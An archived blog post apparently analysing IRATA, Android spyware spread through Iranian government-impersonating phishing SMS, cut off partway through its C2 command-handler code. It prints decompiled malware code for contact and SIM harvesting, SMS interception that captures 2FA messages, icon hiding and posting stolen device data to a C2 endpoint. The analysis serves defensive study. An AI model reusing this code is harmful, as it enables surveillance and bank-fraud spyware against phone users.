{
	"id": "6bcb955b-dc05-459d-8689-ef5f28482db8",
	"created_at": "2026-04-06T00:14:28.74076Z",
	"updated_at": "2026-04-10T03:20:03.231256Z",
	"deleted_at": null,
	"sha1_hash": "893f0adbc9bc565d0dfe8621c7964f3ca488d65f",
	"title": "Technical analysis of IRATA android malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 672321,
	"plain_text": "Technical analysis of IRATA android malware\nBy Muhammad Hasan Ali\nPublished: 2022-08-26 · Archived: 2026-04-06 00:02:52 UTC\n23 minute read\nبسم الله الرحمن الرحيم\nFreePalestine\nIntroductionPermalink\nIn this blog, we will talk about IRATA. IRATA comes from a phishing attack to Iran. The victim receives a\nlegitimate-looking SMS with a link to a phishing page that is impersonating government services, and lures them\nto download a malicious Android application and then pay a small fee for the service. The malicious application\nnot only collects the victim’s credit card numbers, but also gains access to their 2FA authentication SMS, and turn\nthe victim’s device into a bot capable of spreading similar phishing SMS to other potential victims.\nTechnical reviewPermalink\ncollect SMS: the malware collects victim’s SMS messages and then upload it to C2 server\nBypass 2FA: After stealing credentials and SMS of the victim’s device which have the 2FA SMS to grantee\nthe withdraw that the attacker did.\nSpam: The malware collects contacts to send phishing SMS to them.\nFCM: Using Firebase Cloud Messaging FCM as a C2 server to avoid detection.\nStatic analysisPermalink\nExplore AndroidManifest.xmlPermalink\nAndroidManifest.xml is not human-readable so we use apktool to decompile the apk first to be able to read\nthe file and then open the AndroidManifest.xml . We need to read this file to know the ability of this malicious\nAPK and know more inforamation such as entry points for the app, Activities, Services, Intents, app permissions,\nand package name. https://muha2xmad.github.io/malware-analysis/irata/\nPage 1 of 23\n\nAs we see the malware has the ability to steal SMS, steal contacts, and know the state of the phone. This is the\nability of a spyware which is gets your SMS and read your contacts to get more victims to send phishing SMS to.\ncom.google.android.c2dm.permission.RECEIVE is to receive data form internet or cloud because the app uses\nGoogle Firebase to get commands from C2 server.\nBIND_GET_INSTALL_REFERRER_SERVICE is used by Firebase to recognize from where the app was installed.\nWhen the app gets the peromissions related to SMS, The malware will collect the SMS from the victim’s phone\nand upload it to the C2 server.\nDive into classes.dexPermalink\nWe will unzip the APK file to get classes.dex file which has the compiled java code in dex form. We need to\nconvert classes.dex file into .jar file using d2j-dex2jar classes.dex command then use JD-GUI or\nJADX-GUI which we will use. Or if you have JEB decompiler just drag and drop the classes.dex file.\nAfter digging into the classes and methods, in anywheresoftware then phone we see some classes the malware\nwill use to do its malicious activities.\nhttps://muha2xmad.github.io/malware-analysis/irata/\nPage 2 of 23\n\nFigure(1) malicious activities\r\nWe see CallLogWrapper class which will be used to collect call logs of the victim and their details such as date,\r\ntype, duration, number, _id . And then send it to the C2 server.\r\n@BA.ShortName(\"CallLog\")\r\n/* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/CallLogWrapper.class */\r\npublic class CallLogWrapper {\r\n private static final String[] calls_projection = {\"date\", \"type\", \"duration\", \"number\", \"_id\", AppMeasuremen\r\n @BA.ShortName(\"CallItem\")\r\n /* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/CallLogWrapper$CallItem.class */\r\n public static class CallItem {\r\n public static final int TYPE_INCOMING = 1;\r\n public static final int TYPE_MISSED = 3;\r\n public static final int TYPE_OUTGOING = 2;\r\n public String CachedName;\r\n public int CallType;\r\n public long Date;\r\n public long Duration;\r\n public int Id;\r\n public String Number;\r\n public CallItem() {\r\n this.Id = -1;\r\n this.CachedName = \"\";\r\n }\r\n CallItem(String str, int i, long j, int i2, long j2, String str2) {\r\n this.Id = -1;\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 3 of 23\n\nthis.CachedName = \"\";\r\n this.Number = str == null ? \"\" : str;\r\n this.Id = i;\r\n this.CallType = i2;\r\n this.Duration = j;\r\n this.Date = j2;\r\n this.CachedName = str2 == null ? \"\" : str2;\r\n }\r\n public String toString() {\r\n return \"Id=\" + this.Id + \", Number=\" + this.Number + \",CachedName=\" + this.CachedName + \", Type=\" +\r\n }\r\n }\r\nBut how we know that this class is even used, we try to know if this class is called from other classes using find\r\nusage in jadx-gui . just right-clicking on CallLogWrapper then find usage(x) . We see it’s not used by\r\nany classes.\r\nFigure(2) `CallLogWrapper` is not used\r\nThen we go to ContactsWrapper which will collect the victim’s contacts and their details such as\r\ntimes_contacted, number, last_time_contacted, display_name . And the malware will collect the emails\r\nconnected to the contact such as EMAIL_HOME and EMAIL_CUSTOM and others. And even collects the photos of the\r\ncontacts if it’s found.\r\n@BA.ShortName(\"Contacts\")\r\n/* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/ContactsWrapper.class */\r\npublic class ContactsWrapper {\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 4 of 23\n\nprivate static final String[] people_projection = {\"times_contacted\", \"number\", \"last_time_contacted\", \"disp\r\n @BA.ShortName(\"Contact\")\r\n /* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/ContactsWrapper$Contact.class */\r\n public static class Contact {\r\n public static final int EMAIL_CUSTOM = 0;\r\n public static final int EMAIL_HOME = 1;\r\n public static final int EMAIL_MOBILE = 4;\r\n public static final int EMAIL_OTHER = 3;\r\n public static final int EMAIL_WORK = 2;\r\n public static final int PHONE_CUSTOM = 0;\r\n public static final int PHONE_FAX_HOME = 5;\r\n public static final int PHONE_FAX_WORK = 4;\r\n public static final int PHONE_HOME = 1;\r\n public static final int PHONE_MOBILE = 2;\r\n public static final int PHONE_OTHER = 7;\r\n public static final int PHONE_PAGER = 6;\r\n public static final int PHONE_WORK = 3;\r\n public String DisplayName;\r\n public int Id;\r\n public long LastTimeContacted;\r\n public String Name;\r\n public String Notes;\r\n public String PhoneNumber;\r\n public boolean Starred;\r\n public int TimesContacted;\r\n public Contact() {\r\n this.PhoneNumber = \"\";\r\n this.Id = -1;\r\n }\r\n /* JADX INFO: Access modifiers changed from: package-private */\r\n public Contact(String str, String str2, boolean z, int i, String str3, int i2, long j, String str4) {\r\n this.PhoneNumber = \"\";\r\n this.Id = -1;\r\n this.DisplayName = str == null ? \"\" : str;\r\n this.PhoneNumber = str2 == null ? \"\" : str2;\r\n this.Starred = z;\r\n this.Id = i;\r\n this.Notes = str3 == null ? \"\" : str3;\r\n this.TimesContacted = i2;\r\n this.LastTimeContacted = j;\r\n this.Name = str4 == null ? \"\" : str4;\r\n }\r\n public Map GetEmails() {\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 5 of 23\n\nif (this.Id != -1) {\r\n Cursor query = BA.applicationContext.getContentResolver().query(Uri.withAppendedPath(ContentUris\r\n Map map = new Map();\r\n map.Initialize();\r\n while (query.moveToNext()) {\r\n map.Put(query.getString(0), Integer.valueOf(query.getInt(1)));\r\n }\r\n query.close();\r\n return map;\r\n }\r\n throw new RuntimeException(\"Contact object should be set by calling one of the Contacts methods.\");\r\n }\r\n public Map GetPhones() {\r\n if (this.Id != -1) {\r\n Cursor query = BA.applicationContext.getContentResolver().query(Uri.withAppendedPath(ContentUris\r\n Map map = new Map();\r\n map.Initialize();\r\n while (query.moveToNext()) {\r\n map.Put(query.getString(0), Integer.valueOf(query.getInt(1)));\r\n }\r\n query.close();\r\n return map;\r\n }\r\n throw new RuntimeException(\"Contact object should be set by calling one of the Contacts methods.\");\r\n }\r\n public CanvasWrapper.BitmapWrapper GetPhoto() {\r\n if (this.Id != -1) {\r\n Cursor query = BA.applicationContext.getContentResolver().query(Uri.withAppendedPath(ContentUris\r\n CanvasWrapper.BitmapWrapper bitmapWrapper = null;\r\n if (query.moveToNext()) {\r\n byte[] blob = query.getBlob(0);\r\n bitmapWrapper = null;\r\n if (blob != null) {\r\n File.InputStreamWrapper inputStreamWrapper = new File.InputStreamWrapper();\r\n inputStreamWrapper.InitializeFromBytesArray(blob, 0, blob.length);\r\n bitmapWrapper = new CanvasWrapper.BitmapWrapper();\r\n bitmapWrapper.Initialize2(inputStreamWrapper.getObject());\r\n }\r\n }\r\n query.close();\r\n return bitmapWrapper;\r\n }\r\n throw new RuntimeException(\"Contact object should be set by calling one of the Contacts methods.\");\r\n }\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 6 of 23\n\npublic String toString() {\r\n return \"DisplayName=\" + this.DisplayName + \", PhoneNumber=\" + this.PhoneNumber + \", Starred=\" + this\r\n }\r\n }\r\n private List getAllContacts(String str, String[] strArr) {\r\n Cursor query = BA.applicationContext.getContentResolver().query(Contacts.People.CONTENT_URI, people_proj\r\n List list = new List();\r\n list.Initialize();\r\n HashMap hashMap = new HashMap();\r\n for (int i = 0; i \u003c query.getColumnCount(); i++) {\r\n hashMap.put(query.getColumnName(i), Integer.valueOf(i));\r\n }\r\n while (query.moveToNext()) {\r\n list.Add(new Contact(query.getString(((Integer) hashMap.get(\"display_name\")).intValue()), query.getS\r\n }\r\n query.close();\r\n return list;\r\n }\r\nBut this class is not used by any classes too.\r\nWe go to PackageManager class. Which will retrive the information about all installed packages on the victim’s\r\nphone such as name and version code . Maybe for overlay attack The malware opens an active window over\r\na legitimate program. The opened malicious window is the same as the legitimate program. the victim will try to\r\nenter his/her credintial. The malware can steal the victim’s credential data such as payment data or login data.\r\nBut there’s no indication of this attack in this malware.\r\n@BA.ShortName(\"PackageManager\")\r\n/* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/PackageManagerWrapper.class */\r\npublic class PackageManagerWrapper {\r\n private PackageManager pm = BA.applicationContext.getPackageManager();\r\n public Drawable GetApplicationIcon(String str) throws PackageManager.NameNotFoundException {\r\n return this.pm.getApplicationIcon(str);\r\n }\r\n public IntentWrapper GetApplicationIntent(String str) {\r\n IntentWrapper intentWrapper = new IntentWrapper();\r\n intentWrapper.setObject(this.pm.getLaunchIntentForPackage(str));\r\n return intentWrapper;\r\n }\r\n public String GetApplicationLabel(String str) throws PackageManager.NameNotFoundException {\r\n PackageManager packageManager = this.pm;\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 7 of 23\n\nCharSequence applicationLabel = packageManager.getApplicationLabel(packageManager.getApplicationInfo(str\r\n return applicationLabel == null ? \"\" : applicationLabel.toString();\r\n }\r\n public List GetInstalledPackages() {\r\n List list = new List();\r\n java.util.List\u003cPackageInfo\u003e installedPackages = this.pm.getInstalledPackages(0);\r\n list.Initialize();\r\n for (PackageInfo packageInfo : installedPackages) {\r\n list.Add(packageInfo.packageName);\r\n }\r\n return list;\r\n }\r\n public int GetVersionCode(String str) throws PackageManager.NameNotFoundException {\r\n return this.pm.getPackageInfo(str, 0).versionCode;\r\n }\r\n public String GetVersionName(String str) throws PackageManager.NameNotFoundException {\r\n return this.pm.getPackageInfo(str, 0).versionName;\r\n }\r\n public List QueryIntentActivities(Intent intent) {\r\n java.util.List\u003cResolveInfo\u003e queryIntentActivities = this.pm.queryIntentActivities(intent, 0);\r\n List list = new List();\r\n list.Initialize();\r\n for (ResolveInfo resolveInfo : queryIntentActivities) {\r\n list.Add(new ComponentName(resolveInfo.activityInfo.packageName, resolveInfo.activityInfo.name).flat\r\n }\r\n return list;\r\n }\r\n}\r\nAnd this class is not used by any classes too.\r\nWe go for phone class. The malware collects more info about the victim’s phone such as the state of the phone if\r\nit’s RINGER_SILENT or RINGER_NORMAL and more. The malware will try to intercept the Emails which comes to\r\nthe victim’s phone. The malware collects the sender email, receiver email and body and more.\r\n@BA.ShortName(\"Email\")\r\n /* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/Phone$Email.class */\r\n public static class Email {\r\n public String Subject = \"\";\r\n public String Body = \"\";\r\n public List To = new List();\r\n public List CC = new List();\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 8 of 23\n\npublic List BCC = new List();\r\n public List Attachments = new List();\r\n public Email() {\r\n this.To.Initialize();\r\n this.CC.Initialize();\r\n this.BCC.Initialize();\r\n this.Attachments.Initialize();\r\n }\r\n private Intent getIntent(boolean z) {\r\n Intent intent = new Intent(\"android.intent.action.SEND_MULTIPLE\");\r\n intent.setType(z ? \"text/html\" : \"text/plain\");\r\n intent.putExtra(\"android.intent.extra.EMAIL\", (String[]) this.To.getObject().toArray(new String[0]))\r\n intent.putExtra(\"android.intent.extra.CC\", (String[]) this.CC.getObject().toArray(new String[0]));\r\n intent.putExtra(\"android.intent.extra.BCC\", (String[]) this.BCC.getObject().toArray(new String[0]));\r\n intent.putExtra(\"android.intent.extra.SUBJECT\", this.Subject);\r\n intent.putExtra(\"android.intent.extra.TEXT\", z ? Html.fromHtml(this.Body) : this.Body);\r\n ArrayList\u003c? extends Parcelable\u003e arrayList = new ArrayList\u003c\u003e();\r\n for (Object obj : this.Attachments.getObject()) {\r\n if (obj instanceof Uri) {\r\n arrayList.add((Uri) obj);\r\n } else {\r\n arrayList.add(Uri.fromFile(new java.io.File((String) obj)));\r\n }\r\n }\r\n if (arrayList.size() == 1) {\r\n intent.putExtra(\"android.intent.extra.STREAM\", arrayList.get(0));\r\n intent.setAction(IntentWrapper.ACTION_SEND);\r\n } else if (arrayList.size() \u003e 1) {\r\n intent.putParcelableArrayListExtra(\"android.intent.extra.STREAM\", arrayList);\r\n }\r\n return intent;\r\n }\r\nThen the malware will collect info about SIM such as Sim Serial Number , Device Id , Subscriber Id .\r\n@BA.ShortName(\"PhoneId\")\r\n /* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/Phone$PhoneId.class */\r\n public static class PhoneId {\r\n public static String GetDeviceId() {\r\n String deviceId = ((TelephonyManager) BA.applicationContext.getSystemService(\"phone\")).getDeviceId()\r\n String str = deviceId;\r\n if (deviceId == null) {\r\n str = \"\";\r\n }\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 9 of 23\n\nreturn str;\r\n }\r\n public static String GetLine1Number() {\r\n String line1Number = ((TelephonyManager) BA.applicationContext.getSystemService(\"phone\")).getLine1Nu\r\n String str = line1Number;\r\n if (line1Number == null) {\r\n str = \"\";\r\n }\r\n return str;\r\n }\r\n public static String GetSimSerialNumber() {\r\n String simSerialNumber = ((TelephonyManager) BA.applicationContext.getSystemService(\"phone\")).getSim\r\n String str = simSerialNumber;\r\n if (simSerialNumber == null) {\r\n str = \"\";\r\n }\r\n return str;\r\n }\r\n public static String GetSubscriberId() {\r\n String subscriberId = ((TelephonyManager) BA.applicationContext.getSystemService(\"phone\")).getSubscr\r\n String str = subscriberId;\r\n if (subscriberId == null) {\r\n str = \"\";\r\n }\r\n return str;\r\n }\r\n }\r\nThe malware will collect info about the lock of the phone if it has lock or not or make the phone wake or uses\r\nvoice lock. And gets info about network type using GetNetworkType() class. And get info about phone type\r\nusing GetPhoneType() .\r\nWe go for PhoneEvents class. In this class, the malware will intercept the SMS comming to the victim’s phone.\r\n @BA.ShortName(\"SmsInterceptor\")\r\n /* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/PhoneEvents$SMSInterceptor.class */\r\n public static class SMSInterceptor {\r\n private BA ba;\r\n private BroadcastReceiver br;\r\n private String eventName;\r\n public void Initialize(String str, BA ba) {\r\n Initialize2(str, ba, 0);\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 10 of 23\n\n}\r\n public void Initialize2(String str, final BA ba, int i) {\r\n this.ba = ba;\r\n this.eventName = str.toLowerCase(BA.cul);\r\n this.br = new BroadcastReceiver() { // from class: anywheresoftware.b4a.phone.PhoneEvents.SMSInterce\r\n @Override // android.content.BroadcastReceiver\r\n public void onReceive(Context context, Intent intent) {\r\n Bundle extras;\r\n SMSInterceptor sMSInterceptor;\r\n if (intent.getAction().equals(\"android.provider.Telephony.SMS_RECEIVED\") \u0026\u0026 (extras = intent\r\n for (Object obj : (Object[]) extras.get(\"pdus\")) {\r\n SmsMessage createFromPdu = SmsMessage.createFromPdu((byte[]) obj);\r\n Boolean bool = (Boolean) ba.raiseEvent(SMSInterceptor.this, String.valueOf(sMSInterc\r\n if (bool != null \u0026\u0026 bool.booleanValue()) {\r\n abortBroadcast();\r\n }\r\n }\r\n }\r\n }\r\n };\r\n IntentFilter intentFilter = new IntentFilter(\"android.provider.Telephony.SMS_RECEIVED\");\r\n intentFilter.setPriority(i);\r\n BA.applicationContext.registerReceiver(this.br, intentFilter);\r\n }\r\n public void ListenToOutgoingMessages() {\r\n final Uri parse = Uri.parse(\"content://sms\");\r\n BA.applicationContext.getContentResolver().registerContentObserver(parse, true, new ContentObserver(\r\n @Override // android.database.ContentObserver\r\n public void onChange(boolean z) {\r\n super.onChange(z);\r\n Cursor query = BA.applicationContext.getContentResolver().query(parse, null, null, null, nul\r\n if (query.moveToNext()) {\r\n String string = query.getString(query.getColumnIndex(\"protocol\"));\r\n int i = query.getInt(query.getColumnIndex(\"type\"));\r\n if (string == null \u0026\u0026 i == 2) {\r\n BA ba = SMSInterceptor.this.ba;\r\n ba.raiseEvent(null, String.valueOf(SMSInterceptor.this.eventName) + \"_messagesent\",\r\n query.close();\r\n }\r\n }\r\n }\r\n });\r\n }\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 11 of 23\n\nAnd the malware will try to know more about the state of the phone such as if the phone is shutdown or screan is\r\nOFF, an app is removed, an app is added, or the state of battary.\r\npublic PhoneEvents() {\r\n HashMap\u003cString, ActionHandler\u003e hashMap = new HashMap\u003c\u003e();\r\n this.map = hashMap;\r\n hashMap.put(\"android.speech.tts.TTS_QUEUE_PROCESSING_COMPLETED\", new ActionHandler(this) { // from class\r\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\n super(this, null);\r\n this.event = \"_texttospeechfinish\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n send(intent, null);\r\n }\r\n });\r\n this.map.put(\"android.net.conn.CONNECTIVITY_CHANGE\", new ActionHandler(this) { // from class: anywhereso\r\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\n super(this, null);\r\n this.event = \"_connectivitychanged\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n NetworkInfo networkInfo = (NetworkInfo) intent.getParcelableExtra(\"networkInfo\");\r\n send(intent, new Object[]{networkInfo.getTypeName(), networkInfo.getState().toString()});\r\n }\r\n });\r\n this.map.put(\"android.intent.action.USER_PRESENT\", new ActionHandler(this) { // from class: anywheresoft\r\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\n super(this, null);\r\n this.event = \"_userpresent\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n send(intent, null);\r\n }\r\n });\r\n this.map.put(\"android.intent.action.ACTION_SHUTDOWN\", new ActionHandler(this) { // from class: anywheres\r\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\n super(this, null);\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 12 of 23\n\nthis.event = \"_shutdown\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n send(intent, null);\r\n }\r\n });\r\n this.map.put(\"android.intent.action.SCREEN_ON\", new ActionHandler(this) { // from class: anywheresoftwar\r\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\n super(this, null);\r\n this.event = \"_screenon\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n send(intent, null);\r\n }\r\n });\r\n this.map.put(\"android.intent.action.SCREEN_OFF\", new ActionHandler(this) { // from class: anywheresoftwa\r\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\n super(this, null);\r\n this.event = \"_screenoff\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n send(intent, null);\r\n }\r\n });\r\n this.map.put(\"android.intent.action.PACKAGE_REMOVED\", new ActionHandler(this) { // from class: anywheres\r\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\n super(this, null);\r\n this.event = \"_packageremoved\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n send(intent, new Object[]{intent.getDataString()});\r\n }\r\n });\r\n this.map.put(\"android.intent.action.PACKAGE_ADDED\", new ActionHandler(this) { // from class: anywheresof\r\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 13 of 23\n\nsuper(this, null);\r\n this.event = \"_packageadded\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n send(intent, new Object[]{intent.getDataString()});\r\n }\r\n });\r\n this.map.put(\"android.intent.action.DEVICE_STORAGE_LOW\", new ActionHandler(this) { // from class: anywhe\r\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\n super(this, null);\r\n this.event = \"_devicestoragelow\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n send(intent, null);\r\n }\r\n });\r\n this.map.put(\"b4a.smssent\", new ActionHandler(this) { // from class: anywheresoftware.b4a.phone.PhoneEve\r\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\n super(this, null);\r\n this.event = \"_smssentstatus\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n int i = this.resultCode;\r\n send(intent, new Object[]{Boolean.valueOf(this.resultCode == -1), i != -1 ? i != 1 ? i != 2 ? i\r\n }\r\n });\r\n this.map.put(\"b4a.smsdelivered\", new ActionHandler(this) { // from class: anywheresoftware.b4a.phone.Pho\r\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\n super(this, null);\r\n this.event = \"_smsdelivered\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n send(intent, new Object[]{intent.getStringExtra(\"phone\")});\r\n }\r\n });\r\n this.map.put(\"android.intent.action.DEVICE_STORAGE_OK\", new ActionHandler(this) { // from class: anywher\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 14 of 23\n\n/* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\n super(this, null);\r\n this.event = \"_devicestorageok\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n send(intent, null);\r\n }\r\n });\r\n this.map.put(\"android.intent.action.BATTERY_CHANGED\", new ActionHandler(this) { // from class: anywheres\r\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\n super(this, null);\r\n this.event = \"_batterychanged\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n send(intent, new Object[]{Integer.valueOf(intent.getIntExtra(FirebaseAnalytics.Param.LEVEL, 0)),\r\n }\r\n });\r\n this.map.put(\"android.intent.action.AIRPLANE_MODE\", new ActionHandler(this) { // from class: anywheresof\r\n /* JADX WARN: 'super' call moved to the top of the method (can break code semantics) */\r\n {\r\n super(this, null);\r\n this.event = \"_airplanemodechanged\";\r\n }\r\n @Override // anywheresoftware.b4a.phone.PhoneEvents.ActionHandler\r\n public void handle(Intent intent) {\r\n send(intent, new Object[]{Boolean.valueOf(intent.getBooleanExtra(\"state\", false))});\r\n }\r\n });\r\n for (Map.Entry\u003cString, ActionHandler\u003e entry : this.map.entrySet()) {\r\n entry.getValue().action = entry.getKey();\r\n }\r\n }\r\nThe last class is SmsWrapper , the malware will try to collect SMS from the victim’s phone such as _id,\r\naddress, type, body, person, date . Then query this info to upload it to C2 server.\r\n@BA.ShortName(\"SmsMessages\")\r\n/* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/SmsWrapper.class */\r\npublic class SmsWrapper {\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 15 of 23\n\npublic static final int TYPE_DRAFT = 3;\r\n public static final int TYPE_FAILED = 5;\r\n public static final int TYPE_INBOX = 1;\r\n public static final int TYPE_OUTBOX = 4;\r\n public static final int TYPE_QUEUED = 6;\r\n public static final int TYPE_SENT = 2;\r\n public static final int TYPE_UNKNOWN = 0;\r\n private static final String[] projection = {\"_id\", \"thread_id\", \"address\", \"read\", \"type\", \"body\", \"person\",\r\n @BA.ShortName(\"Sms\")\r\n /* loaded from: classes-dex2jar.jar:anywheresoftware/b4a/phone/SmsWrapper$Sms.class */\r\n public static class Sms {\r\n public String Address;\r\n public String Body;\r\n public long Date;\r\n public int Id;\r\n public int PersonId;\r\n public boolean Read;\r\n public int ThreadId;\r\n public int Type;\r\n public Sms() {\r\n }\r\n public Sms(int i, int i2, int i3, long j, boolean z, int i4, String str, String str2) {\r\n this.Id = i;\r\n this.ThreadId = i2;\r\n this.PersonId = i3;\r\n this.Date = j;\r\n this.Read = z;\r\n this.Type = i4;\r\n this.Body = str;\r\n this.Address = str2;\r\n }\r\n public String toString() {\r\n return \"Id=\" + this.Id + \", ThreadId=\" + this.ThreadId + \", PersonId=\" + this.PersonId + \", Date=\" +\r\n }\r\n }\r\nWe try to see if it’s used in any classes, we see it’s used in firebasemessaging class.\r\nIn this class the malware will prepare the whole info which is collected to send it to the C2 server. The C2 server\r\nis firebase Cloud Messaging FCM which is provided by Google. The malware uses FCM to avoide detection. The\r\nmalware will import these classes, every class collects info from the victim’s phone such as PhoneEvents ,\r\nSmsWrapper , Phone .\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 16 of 23\n\nimport android.app.Service;\r\nimport android.content.BroadcastReceiver;\r\nimport android.content.ComponentName;\r\nimport android.content.Context;\r\nimport android.content.Intent;\r\nimport android.os.IBinder;\r\nimport androidx.core.app.NotificationCompat;\r\nimport anywheresoftware.b4a.BA;\r\nimport anywheresoftware.b4a.agraham.reflection.Reflection;\r\nimport anywheresoftware.b4a.keywords.B4AApplication;\r\nimport anywheresoftware.b4a.keywords.Common;\r\nimport anywheresoftware.b4a.keywords.DateTime;\r\nimport anywheresoftware.b4a.objects.FirebaseNotificationsService;\r\nimport anywheresoftware.b4a.objects.IntentWrapper;\r\nimport anywheresoftware.b4a.objects.NotificationWrapper;\r\nimport anywheresoftware.b4a.objects.RuntimePermissions;\r\nimport anywheresoftware.b4a.objects.ServiceHelper;\r\nimport anywheresoftware.b4a.objects.collections.List;\r\nimport anywheresoftware.b4a.objects.collections.Map;\r\nimport anywheresoftware.b4a.objects.streams.File;\r\nimport anywheresoftware.b4a.phone.Phone;\r\nimport anywheresoftware.b4a.phone.PhoneEvents;\r\nimport anywheresoftware.b4a.phone.SmsWrapper;\r\nimport b4a.example.contactsutils;\r\nimport com.reza.sh.deviceinfo.DiviceInfo;\r\nimport java.lang.reflect.Method;\r\nIn NotificationCompat the malware will get the type of the notifications if the notification is from alarm, social,\r\ncall, or email.\r\nIn DiviceInfo the malware will get the device info such as IsAirPlane mode, accounts, anroid ID, or UUID.\r\nNow, in this class the malware will send commands from the C2 server to the victim’s phone. To control the state\r\nof the phone to set on Vibration or set volumn to specific sound or silent.\r\n if (_comand.equals(\"vibrate\") \u0026\u0026 _android.equals(_androidid)) {\r\n Phone.SetRingerMode(1);\r\n }\r\n if (_comand.equals(NotificationCompat.GROUP_KEY_SILENT) \u0026\u0026 _android.equals(_androidid)) {\r\n Phone.SetVolume(5, 0, false);\r\n Phone.SetVolume(1, 0, false);\r\n Phone.SetVolume(4, 0, false);\r\n Phone.SetVolume(3, 0, false);\r\n }\r\n if (_comand.equals(\"normal\") \u0026\u0026 _android.equals(_androidid)) {\r\nhttps://muha2xmad.github.io/malware-analysis/irata/\r\nPage 17 of 23\n\nPhone.SetRingerMode(2);\r\n Phone.SetVolume(5, 100, false);\r\n Phone.SetVolume(1, 100, false);\r\n Phone.SetVolume(4, 100, false);\r\n Phone.SetVolume(3, 100, false);\r\n }\r\nThe mlawre will check the connectivity to the internet with ping or send single SMS.\r\n if (_comand.equals(\"ping\")) {\r\n String str = \"result=ok\u0026action=ping\u0026androidid=\" + _android + \"\u0026model=\" + _model + \"\u0026battry=\" + _batt\r\n _data = str;\r\n _ht._poststring(_apilink, str);\r\n }\r\n if (_comand.equals(\"pingone\") \u0026\u0026 _android.equals(_androidid)) {\r\n String str2 = \"result=ok\u0026action=pingone\u0026androidid=\" + _android + \"\u0026model=\" + _model + \"\u0026battry=\" + _\r\n _data = str2;\r\n _ht._poststring(_apilink, str2);\r\n }\r\n if (_comand.equals(\"SendSingleMessage\") \u0026\u0026 _android.equals(_androidid)) {\r\n _sendlargesms(_nump, _txm);\r\n }\r\nThe malware will send a command send device info and command to hide/unhide the icon of installed APK.\r\n if (_comand.equals(\"getdevicefullinfo\") \u0026\u0026 _android.equals(_androidid)) {\r\n Common.LogImpl(\"83473462\", \"Deviceinfo is OK\", 0);\r\n String str3 = \"result=ok\u0026action=getdevicefullinfo\u0026androidid=\" + _android + \"\u0026opr=\" + _opr + \"\u0026model=\r\n _data = str3;\r\n _ht._poststring(_apilink, str3);\r\n }\r\n if (_comand.equals(\"hideicon\") \u0026\u0026 _android.equals(_androidid)) {\r\n Common.LogImpl(\"83473474\", \"hideicon is OK\", 0);\r\n _hideapp(true);\r\n }\r\n if (_comand.equals(\"showhideicon\") \u0026\u0026 _android.equals(_androidid)) {\r\n Common.LogImpl(\"83473483\", \"unhideicon 